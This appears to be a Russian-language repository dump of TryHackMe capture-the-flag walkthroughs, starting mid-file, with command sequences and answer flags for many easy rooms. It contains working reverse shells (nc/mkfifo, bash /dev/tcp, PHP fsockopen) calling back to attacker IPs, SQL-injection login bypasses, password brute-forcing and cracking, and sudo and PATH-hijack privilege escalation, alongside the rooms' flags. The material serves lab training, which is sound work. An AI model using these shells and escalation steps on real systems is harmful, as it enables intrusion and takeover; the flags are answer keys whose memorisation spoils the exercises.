backup.pl 63 | -rw-r--r-x 1 root root 47 Nov 29 2019 backup.pl 64 | $ cat backup.pl 65 | #!/usr/bin/perl 66 | 67 | system("sh", "/etc/copy.sh"); 68 | 69 | $ ls -l /etc/copy.sh 70 | -rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh 71 | $ cat /etc/copy.sh 72 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $my_IP 5555 >/tmp/f 73 | 74 | nc -nlvp 5555 75 | 76 | $ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $my_IP 5555 >/tmp/f" > /etc/copy.sh 77 | $ sudo perl /home/itguy/backup.pl 78 | 79 | $ nc -nlvp 5555 80 | /bin/sh: 0: can't access tty; job control turned off 81 | # cat /root/root.txt 82 | THM{6637f41d0177b6f37cb20d775124699f} 83 | ``` 84 | ```commandline 85 | THM{6637f41d0177b6f37cb20d775124699f} 86 | ``` 87 | 88 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Lesson Learned.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Lesson Learned?](https://tryhackme.com/r/room/lessonlearned) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Это относительно простая машина, которая пытается преподать вам урок, но, может быть, вы уже усвоили этот урок? 8 | Давайте выясним. 9 | 10 | Относитесь к этому ящику так, как будто это настоящая цель, а не CTF. 11 | 12 | Пройдите экран входа и вы найдете флаг. Нет никаких кроличьих нор, никаких скрытых файлов, только страница входа и 13 | флаг. Удачи! 14 | 15 | Цель: http:// MACHINE_IP/ 16 | 17 | ### Ответьте на вопросы ниже 18 | Какой флаг? 19 | ```commandline 20 | nmap -sV -sC 21 | http:// 22 | ' AND '1'='1' -- - 23 | ``` 24 | ```commandline 25 | THM{aab02c6b76bb752456a54c80c2d6fb1e} 26 | ``` 27 | 28 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Lian_Yu.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Lian_Yu](https://tryhackme.com/r/room/lianyu) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Добро пожаловать в Lian_YU, этот CTF-бокс для новичков в стиле Arrowverse! Захватывайте флаги и получайте удовольствие. 8 | 9 | ### Ответьте на вопросы ниже 10 | Разверните виртуальную машину и запустите перечисление. 11 | ```commandline 12 | Ответ не нужен 13 | ``` 14 | Какой веб-каталог вы нашли? 15 | ```commandline 16 | nmap -sC -sV 10.10.228.22 17 | gobuster dir -u http://10.10.228.22/ -w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 18 | # http://10.10.228.22/island 19 | # Code Word - 'vigilante' - (this is our FTP username) 20 | gobuster dir -u http://10.10.228.22/island -w/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 21 | ``` 22 | ```commandline 23 | 2100 24 | ``` 25 | Каково имя найденного вами файла? 26 | ```commandline 27 | # http://10.10.228.22/island/2100 28 | # Here it says there is a file with a '.ticket' extension. 29 | gobuster dir --url 10.10.228.22/island/2100 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket 30 | ``` 31 | ```commandline 32 | green_arrow.ticket 33 | ``` 34 | какой пароль FTP? 35 | ```commandline 36 | # http://10.10.228.22/island/2100/green_arrow.ticket 37 | # Seems we found an encryption : 'RTy8yhBQdscX' 38 | # Go to https://gchq.github.io/CyberChef/ 39 | # Use 'FromBase58' to decode it. 40 | ``` 41 | ```commandline 42 | !#th3h00d 43 | ``` 44 | как называется файл с паролем SSH? 45 | ```commandline 46 | ftp 10.10.228.22 47 | # Username - vigilante 48 | # password - !#th3h00d 49 | ls 50 | cd /home 51 | ls 52 | cd vigilante 53 | ls 54 | mget filename * 55 | ls 56 | exiftool Leave_me_alone.png 57 | # The correct header -- https://en.wikipedia.org/wiki/Portable_Network_Graphics 58 | steghide extract -sf aa.jpg 59 | # password 60 | unzip ss.zip 61 | ``` 62 | ```commandline 63 | shado 64 | ``` 65 | пользователь.txt 66 | ```commandline 67 | cat shado 68 | # M3tahuman 69 | ssh slade@10.10.228.22 70 | password - M3tahuman 71 | ls 72 | cat user.txt 73 | ``` 74 | ```commandline 75 | THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0N'T} 76 | ``` 77 | корень.txt 78 | ```commandline 79 | sudo -l 80 | sudo pkexec /bin/sh 81 | whoami 82 | ls 83 | cat root.txt 84 | ``` 85 | ```commandline 86 | THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_I'LL_BE_D34D} 87 | ``` 88 | 89 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Library.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Library](https://tryhackme.com/r/room/bsidesgtlibrary) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Прочитать user.txt и root.txt 8 | 9 | ### Ответьте на вопросы ниже 10 | пользователь.txt 11 | ```commandline 12 | nmap -sC -sV 13 | gobuster dir --url http:// --wordlist /data/src/wordlists/directory-list-2.3-medium.txt 14 | hydra -l meliodas -P /data/src/wordlists/rockyou.txt ssh:// 15 | # login: meliodas password: iloveyou1 16 | ssh meliodas@ 17 | cat user.txt 18 | ``` 19 | ```commandline 20 | 6d488cbb3f111d135722c33cb635f4ec 21 | ``` 22 | корень.txt 23 | ```commandline 24 | sudo -l 25 | cat /home/meliodas/bak.py 26 | rm -f bak.py 27 | 28 | cat > bak.py << EOF 29 | #!/usr/bin/env python 30 | import pty 31 | pty.spawn("/bin/bash") 32 | EOF 33 | 34 | sudo /usr/bin/python3 /home/meliodas/bak.py 35 | cat /root/root.txt 36 | ``` 37 | ```commandline 38 | e8c8c6c256c35515d1d344ee0488c617 39 | ``` 40 | 41 | 42 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/MD2PDF.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [MD2PDF](https://tryhackme.com/r/room/md2pdf) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Привет, Хакер! 8 | 9 | Компания TopTierConversions LTD с гордостью объявляет о запуске своего новейшего и самого важного продукта: MD2PDF. 10 | 11 | Эта простая в использовании утилита преобразует файлы Markdown в PDF и абсолютно безопасна! Верно...? 12 | 13 | Примечание: Перед тем как приступить к испытанию, подождите 3–5 минут, пока виртуальная машина полностью загрузится. 14 | 15 | ### Ответьте на вопросы ниже 16 | Что такое флаг? 17 | ```commandline 18 | flag{1f4a2b6ffeaf4707c43885d704eaee4b} 19 | ``` 20 | 21 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Madness/Madness.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Madness](https://tryhackme.com/r/room/madness) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Обратите внимание, что для этого задания не требуется перебор паролей SSH. 8 | 9 | Используйте свои навыки, чтобы получить доступ к учетной записи пользователя и root! 10 | ### Ответьте на вопросы ниже 11 | пользователь.txt 12 | [secret.py](https://github.com/BEPb/tryhackme/blob/master/01.easy/Madness/secret.py) 13 | ```commandline 14 | nmap -sC -sV 15 | curl -s http:// 16 | wget http:///thm.jpg 17 | xxd thm.jpg | head 18 | printf '\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01' | dd conv=notrunc of=thm.jpg bs=1 19 | curl -s http:///th1s_1s_h1dd3n/ 20 | curl -s http:///th1s_1s_h1dd3n/?secret=34 21 | python secret.py 22 | # y2RPJ4QaPF!B 23 | steghide info thm.jpg 24 | steghide extract -sf thm.jpg 25 | cat hidden.txt 26 | # wbxre 27 | echo -n "wbxre" | tr 'A-Za-z' 'N-ZA-Mn-za-m' 28 | # joker 29 | wget https:///5iW7kC8.jpg 30 | steghide info 5iW7kC8.jpg 31 | steghide extract -sf 5iW7kC8.jpg 32 | cat password.txt 33 | sshpass -p "*axA&GF8dP" ssh joker@ 34 | cat user.txt 35 | ``` 36 | ```commandline 37 | THM{d5781e53b130efe2f94f9b0354a5e4ea} 38 | ``` 39 | корень.txt 40 | ```commandline 41 | find / -user root -perm -u=s 2>/dev/null 42 | ls -l /bin/screen* 43 | # https://www.exploit-db.com/exploits/41154 44 | sh 41154.sh 45 | cat /root/root.txt 46 | ``` 47 | ```commandline 48 | THM{5ecd98aa66a6abb670184d7547c8124a} 49 | ``` 50 | 51 | 52 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Madness/secret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import requests 4 | 5 | host = '10.10.109.114' 6 | url = 'http://{}/th1s_1s_h1dd3n/?secret={}' 7 | 8 | for i in range(100): 9 | r = requests.get(url.format(host, i)) 10 | if not 'That is wrong!' in r.text: 11 | print("Found secret: {}".format(i)) 12 | print(r.text) -------------------------------------------------------------------------------- /01.easy/Mustacchio.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Mustacchio](https://tryhackme.com/r/room/mustacchio) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Убедитесь, что вы подключены к сети TryHackMe. Если вы не знаете, как это сделать, сначала пройдите комнату OpenVPN . 8 | 9 | ### Ответьте на вопросы ниже 10 | Что такое флаг пользователя? 11 | ```commandline 12 | nmap -sC -sV -p- 13 | gobuster dir -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:// 14 | # http:///custom/js/mobile.js 15 | file users.bak 16 | sqlite3 users.bak 17 | # admin:1868e36a6d2b17d4c2745f1659433a54d4bc5f4b 18 | hash-identifier 19 | echo `1868e36a6d2b17d4c2745f1659433a54d4bc5f4b` > user_hash 20 | john user_hash --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt 21 | # admin:bulldog19 22 | # http://:8765 23 | XXE vulnerability 24 | /home/barry/.ssh/id_rsa 25 | ssh2john id_rsa > id_rsa.john 26 | john id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt 27 | chmod 600 id_rsa 28 | ssh -i id_rsa barry@ 29 | cat user.txt 30 | ``` 31 | ```commandline 32 | 62d77a4d5f97d47c5aa38b3b2651b831 33 | ``` 34 | Что такое корневой флаг? 35 | ```commandline 36 | find / -user root -perm -4000 — exec ls -ldb {} \; 37 | file live_log 38 | strings live_log 39 | ``` 40 | `tail -f /var/log/nginx/accessl.log` показывает нам, что исполняемый файл запущен без полного пути (например, не 41 | использует /usr/bin/curl или /usr/bin/uname). Как это использовать? 42 | ```commandline 43 | 1. Создайте новый каталог в папке /tmp/, например: 44 | mkdir /tmp/shell 45 | 2. Перейдите в эту папку: 46 | cd /tmp/shell 47 | 3. Измените папку /usr/bin на /tmp/shell 48 | export PATH=/tmp/shell:$PATH 49 | 4. Создайте файл tail, введите эти две команды: 50 | echo '#!/bin/bash' > tail 51 | echo '/bin/bash' >> tail 52 | 5. Измените права доступа для файла tail 53 | chmod +x tail 54 | 6. Вернитесь в live_log и запустите файл 55 | ./live_log 56 | 57 | cat /root/root.txt 58 | ``` 59 | ```commandline 60 | 3223581420d906c4dd1a5f9b530393a5 61 | ``` 62 | 63 | 64 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/OhSINT.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [OhSINT](https://tryhackme.com/r/room/ohsint) 4 | 5 | Всего 1 задание: 6 | ## Задание 1 7 | Какую информацию можно получить, используя всего одну фотографию? 8 | 9 | Примечание: Это испытание было обновлено 2024-02-01. Если вы следуете каким-либо старым пошаговым руководствам, 10 | ожидайте небольших изменений. 11 | 12 | ### Ответить на вопросы ниже 13 | Что изображено на аватаре этого пользователя? 14 | ```commandline 15 | cat 16 | ``` 17 | В каком городе находится этот человек? 18 | ```commandline 19 | London 20 | ``` 21 | Каков SSID точки доступа, к которой он подключился? 22 | ```commandline 23 | UnileverWiFi 24 | ``` 25 | Какой у него личный адрес электронной почты? 26 | ```commandline 27 | OWoodflint@gmail.com 28 | ``` 29 | На каком сайте вы нашли его адрес электронной почты? 30 | ```commandline 31 | Github 32 | ``` 33 | Куда он ездил в отпуск? 34 | ```commandline 35 | New York 36 | ``` 37 | Какой пароль у этого человека? 38 | ```commandline 39 | pennYDr0pper.! 40 | ``` 41 | 42 | 43 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Opacity.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Opacity](https://tryhackme.com/r/room/opacity) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Opacity — это простая машина, которая может помочь вам в процессе обучения тестированию на проникновение. 8 | 9 | На машине есть 2 хэш-ключа (пользовательский - local.txt и корневой - proof.txt). Сможете ли вы их найти и стать root? 10 | 11 | Совет: существует несколько способов выполнить действие; всегда анализируйте поведение приложения. 12 | 13 | ### Ответьте на вопросы ниже 14 | Что такое флаг local.txt? 15 | ```commandline 16 | nmap -sC -sV -p- 17 | gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http:// 18 | http:///cloud/ 19 | /usr/share/webshells/php/php-reverse-shell.php 20 | nc -nvlp 1234 21 | python3 -c 'import pty;pty.spawn("/bin/bash");' 22 | wget http://:8080/dataset.kdbx 23 | keepass2john dataset.kdbx > keepass.hash 24 | john keepass.hash --wordlist=/usr/share/wordlist/rockyou.txt 25 | keepassxc dataset.kdbx 26 | ssh sysadmin@ 27 | cat local.txt 28 | 29 | ``` 30 | ```commandline 31 | 6661b61b44d234d230d06bf5b3c075e2 32 | ``` 33 | Что такое флаг proof.txt? 34 | ```commandline 35 | nc -nvlp 1235 36 | cat proof.txt 37 | ``` 38 | ```commandline 39 | ac0d56f93202dd57dcb2498c739fd20e 40 | ``` 41 | 42 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Overpass.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Overpass](https://tryhackme.com/r/room/overpass) 4 | 5 | Всего 1 задание: 6 | ## Задание 1 7 | Что происходит, когда группа нищих студентов-компьютерщиков пытается создать менеджер паролей? 8 | Очевидно, что это идеальный коммерческий успех! 9 | 10 | На этой коробке спрятан код подписки TryHackMe. Первый, кто найдет и активирует его, получит подписку на месяц 11 | бесплатно! Если вы уже являетесь подписчиком, почему бы не передать код другу? 12 | 13 | ОБНОВЛЕНИЕ: Код теперь заявлен. 14 | Машина была немного изменена 25.09.2020. Это было сделано только для улучшения производительности машины. Это не 15 | влияет на процесс. 16 | 17 | ### Ответить на вопросы ниже 18 | Взломайте машину и получите флаг в user.txt 19 | ```commandline 20 | sudo nmap -sS -sV {Add your machine ip here} 21 | gobuster --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u {Add your machine ip here} 22 | # {IP целевой машины}/admin 23 | # login.js 24 | 25 | mkdir ssh 26 | nano id_rsa 27 | ssh2john id_rsa > id_rsa.hash 28 | john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 29 | # james13 30 | chmod 600 id_rsa 31 | ssh -i id_rsa {Добавьте сюда IP-адрес вашего компьютера} 32 | yes 33 | james13 34 | cat user.txt 35 | ``` 36 | 37 | ```commandline 38 | thm{65c1aaf000506e56996822c6281e6bf7} 39 | ``` 40 | Повысьте свои привилегии и получите флаг в root.txt 41 | ```commandline 42 | sudo -l 43 | find / -perm -u=s -type -f 2>/dev/null 44 | cat todo.txt 45 | ls -la 46 | cat .overpass 47 | # {IP целевой машины}/downloads 48 | # Используя шифр ROT47 проебразуем кодовою фразу из файла .overpass в пароль пользователя james 49 | sudo -l 50 | crontab -l 51 | nano /etc/hosts 52 | # изменим IP overpass.thm на адресс Вашей атакующей машины 53 | # создадим реверс шел на нашей машине overpass.thm/downloads/src/buildscript.sh 54 | python3 -m http.server 80 55 | nc -nvlp 4444 56 | cat root.txt 57 | ``` 58 | 59 | ```commandline 60 | thm{7f336f8c359dbac18d54fdd64ea753bb} 61 | ``` 62 | 63 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Pickle Rick.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Pickle Rick](https://tryhackme.com/r/room/picklerick) 4 | 5 | Всего 1 задание: 6 | ## Задание 1 7 | В этом задании по мотивам «Рика и Морти» вам предстоит воспользоваться веб-сервером и найти три ингредиента, которые 8 | помогут Рику приготовить зелье и превратиться обратно в человека из огурца. 9 | 10 | Разверните виртуальную машину для этой задачи и изучите веб-приложение: MACHINE_IP 11 | 12 | ### Ответить на вопросы ниже 13 | Какой ингредиент нужен Рику в первую очередь? 14 | ```commandline 15 | mr. meeseek hair 16 | ``` 17 | Какой второй ингредиент в зелье Рика? 18 | ```commandline 19 | 1 jerry tear 20 | ``` 21 | Какой последний и последний ингредиент? 22 | ```commandline 23 | fleeb juice 24 | ``` 25 | 26 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Plotted-TMS.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Plotted-TMS](https://tryhackme.com/r/room/plottedtms) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Удачной охоты! 8 | 9 | Совет: Перечисление — это ключ! 10 | 11 | ### Ответьте на вопросы ниже 12 | Что такое user.txt? 13 | ```commandline 14 | nmap -sV -sC -A -O 15 | dirb http:/// -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt 16 | wget http:///admin/id_rsa 17 | wget http:///passwd 18 | wget http:///shadow 19 | 20 | dirb http://:445 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt 21 | http://:445/management/ 22 | username: admin' or 1=1 -- - 23 | pass: asdfg 24 | nc -lvp 1234 25 | python3 -c 'import pty;pty.spawn("/bin/bash")' 26 | cat user.txt 27 | ``` 28 | ```commandline 29 | 77927510d5edacea1f9e86602f1fbadb 30 | ``` 31 | Что такое root.txt? 32 | ```commandline 33 | 53f85e2da3e874426fa059040a9bdcab 34 | ``` 35 | 36 | 37 | 38 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Publisher.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Publisher]() 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Машина CTF " Publisher " представляет собой смоделированную среду, в которой размещены некоторые службы. С помощью 8 | ряда методов перечисления, включая нечеткий анализ каталогов и идентификацию версий, обнаружена уязвимость, 9 | позволяющая выполнять удаленное выполнение кода (RCE). Попытки повысить привилегии с помощью пользовательского 10 | двоичного файла затруднены ограниченным доступом к критически важным системным файлам и каталогам, что требует более 11 | глубокого исследования профиля безопасности системы, чтобы в конечном итоге использовать лазейку, которая позволяет 12 | выполнять неограниченную оболочку bash и добиться повышения привилегий. 13 | 14 | ### Ответьте на вопросы ниже 15 | Что такое флаг пользователя? 16 | ```commandline 17 | fa229046d44eda6a3598c73ad96f4ca5 18 | ``` 19 | Правильный ответ 20 | Что такое корневой флаг? 21 | ```commandline 22 | 3a4225cc9e85709adda6ef55d6a4f2ca 23 | ``` 24 | 25 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Publisher/requirements.txt: -------------------------------------------------------------------------------- 1 | argparse 2 | bs4 3 | requests 4 | -------------------------------------------------------------------------------- /01.easy/Publisher/reverse.sh: -------------------------------------------------------------------------------- 1 | /bin/bash -i >& /dev/tcp/10.9.0.218/4444 0>&1 2 | -------------------------------------------------------------------------------- /01.easy/Red.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Red](https://tryhackme.com/r/room/redisl33t) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Матч начался, и Red взял на себя инициативу. 8 | Но вы Blue, и только вы можете победить Red. 9 | 10 | Однако Red внедрил некоторые защитные механизмы, которые немного усложнят битву: 11 | 1. Red, как известно, выгоняет противников из машины. Есть ли способ обойти это? 12 | 2. Red любит менять пароли противников, но, как правило, оставляет их относительно прежними. 13 | 3. Red любит дразнить противников, чтобы сбить их с толку. Сохраняйте ясность ума! 14 | 15 | Это уникальная битва, и если вы чувствуете, что готовы к вызову. Тогда, безусловно, дерзайте! 16 | 17 | Когда вы будете готовы, нажмите кнопку «Запустить машину» , чтобы запустить виртуальную машину. 18 | ### Ответьте на вопросы ниже 19 | Какой первый флаг? 20 | ```commandline 21 | THM{Is_thAt_all_y0u_can_d0_blU3?} 22 | ``` 23 | Какой второй флаг? 24 | ```commandline 25 | THM{Y0u_won't_mak3_IT_furTH3r_th@n_th1S} 26 | ``` 27 | Какой третий флаг? 28 | ```commandline 29 | THM{Go0d_Gam3_Blu3_GG} 30 | ``` 31 | Если вам понравилась эта комната, рекомендую посмотреть « Царь горы » от TryHackMe . 32 | ```commandline 33 | Ответ не нужен 34 | ``` 35 | 36 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Smag Grotto.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Smag Grotto](https://tryhackme.com/r/room/smaggrotto) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Разверните машину и получите права root. 8 | 9 | ### Ответьте на вопросы ниже 10 | Что такое флаг пользователя? 11 | ```commandline 12 | nmap 13 | gobuster dir -u http:/// --wordlist=/usr/share/wordlists/dirb/big.txt 14 | # http:///mail 15 | # http:///aW1wb3J0YW50/dHJhY2Uy.pcap 16 | username:helpdesk 17 | password:cH4nG3M3_n0w 18 | # http:///admin.php 19 | 20 | php -r '$sock=fsockopen("",4444);exec("/bin/bash -i <&3 >&3 2>&3");' 21 | rlwrap nc -nlvp 4444 22 | SHELL=/bin/bash script -q /dev/null 23 | cd /home/jake 24 | ls -la 25 | cat user.txt 26 | cat /etc/crontab 27 | ls -l /opt/.backups/jake_id_rsa.pub.backup 28 | ssh-keygen -t rsa 29 | echo "ssh-rsa ....= kali@kali" > /opt/.backups/jake_id_rsa.pub.backup 30 | ssh jake@ 31 | cat user.txt 32 | ``` 33 | ```commandline 34 | iusGorV7EbmxM5AuIe2w499msaSuqU3j 35 | ``` 36 | 37 | Что такое корневой флаг? 38 | ```commandline 39 | sudo -l 40 | sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh 41 | whoami 42 | cat /root/root.txt 43 | ``` 44 | ```commandline 45 | uJr6zRgetaniyHVRqqL58uRasybBKz2T 46 | ``` 47 | 48 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Source.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Source](https://tryhackme.com/r/room/source) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Перечислите и укорените ящик, прикрепленный к этой задаче. Можете ли вы обнаружить источник нарушения и использовать 8 | его, чтобы взять под контроль? 9 | 10 | Путешествие Екатерины на Dribbble 11 | 12 | Эта виртуальная машина также включена в комнату AttackerKB как часть управляемого опыта. Кроме того, вы можете 13 | загрузить OVA Source для использования в автономном режиме с https://www.darkstar7471.com/resources.html 14 | 15 | ### Ответьте на вопросы ниже 16 | пользователь.txt 17 | ```commandline 18 | nmap -sV -sC -Pn 19 | searchsploit webmin 1.890 20 | msfconsole 21 | search webmin 22 | use 7 23 | options 24 | set LHOST tun0 25 | set RHOSTS 26 | exploit 27 | id 28 | cat /home/dark/user.txt 29 | ``` 30 | ```commandline 31 | THM{SUPPLY_CHAIN_COMPROMISE} 32 | ``` 33 | корень.txt 34 | ```commandline 35 | cat /root/root.txt 36 | ``` 37 | ```commandline 38 | THM{UPDATE_YOUR_INSTALL} 39 | ``` 40 | 41 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Startup.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Startup](https://tryhackme.com/r/room/startup) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Мы Spice Hut, новая стартап-компания, которая только что добилась успеха! Мы предлагаем разнообразные специи и 8 | сэндвичи (на случай, если вы проголодаетесь), но вы здесь не для этого. Честно говоря, мы не уверены, знают ли наши 9 | разработчики, что они делают, и наши опасения по поводу безопасности растут. Мы просим вас провести тщательный тест 10 | на проникновение и попробовать получить root-доступ. Удачи! 11 | 12 | ### Ответить на вопросы ниже 13 | В чем секрет рецепта острого супа? 14 | ```commandline 15 | love 16 | ``` 17 | Каково содержимое файла user.txt? 18 | ```commandline 19 | THM{03ce3d619b80ccbfb3b7fc81e46c0e79} 20 | ``` 21 | Каково содержимое файла root.txt? 22 | ```commandline 23 | THM{f963aaa6a430f210222158ae15c3d76d} 24 | ``` 25 | 26 | ## Задание 2 27 | Spice Hut были очень довольны вашими результатами, и они гарантированно распространят информацию о вашем 28 | совершенстве среди своих партнеров. Поразительная работа! 29 | 30 | 31 | 32 | Мою официальную статью можно найти здесь: https://www.youtube.com/watch?v=3qNxI1OggGc 33 | 34 | Я хотел бы поблагодарить ku5e за то, что он хороший сенсей, и GeneralClaw, моего наставника по грамматике. 35 | 36 | Я хотел бы поблагодарить моих тестировщиков Amit25095 , BarZigmon и powershot . 37 | 38 | Кроме того, я хотел бы поблагодарить TryHackMe не только за их платформу, которая изменила мою жизнь, но и за 39 | предоставленную мне возможность внести свой вклад в развитие сообщества. 40 | 41 | И конечно, я хотел бы поблагодарить вас за игру. Надеюсь, увидимся скоро! 42 | 43 | ### Ответить на вопросы ниже 44 | Поздравляю! 45 | ```commandline 46 | Ответ не нужен 47 | ``` 48 | 49 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/TakeOver.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [TakeOver](https://tryhackme.com/r/room/takeover) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Привет, 8 | 9 | я генеральный директор и один из соучредителей futurevera.thm. В Futurevera мы верим, что будущее в космосе. Мы 10 | проводим много космических исследований и пишем блоги об этом. Раньше мы помогали студентам с вопросами о космосе, 11 | но сейчас мы восстанавливаем нашу поддержку. 12 | 13 | Недавно к нам обратились хакеры blackhat, заявив, что могут захватить и просят большой выкуп. Пожалуйста, помогите нам найти то, что они могут захватить. 14 | 15 | Наш сайт находится по адресу https://futurevera.thm 16 | 17 | Подсказка: не забудьте добавить MACHINE_IP в /etc/hosts для futurevera.thm ; ) 18 | 19 | ### Ответьте на вопросы ниже 20 | Какова стоимость флага? 21 | ```commandline 22 | namp -sC -sV 23 | http://portal.futurevera.thm 24 | http://blog.futurevera.thm 25 | ``` 26 | ```commandline 27 | flag{beea0d6edfcee06a59b83fb50ae81b2f} 28 | ``` 29 | 30 | 31 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Team.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Team](https://tryhackme.com/r/room/teamcw) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Привет всем, это мой первый бокс! Он рассчитан на новичков, так как я часто вижу боксы, которые "легкие", но зачастую немного сложнее! 8 | 9 | Пожалуйста, подождите 3–5 минут, пока устройство загрузится. 10 | 11 | Редактировать 06/03/21- Просто для ясности, есть несколько способов получить root-права на этой машине. Один из них 12 | непреднамеренный, но это просто еще одна возможность научиться :) 13 | 14 | Создано:dalemazza 15 | 16 | Благодарим P41ntP4rr0t за помощь в пути . 17 | ### 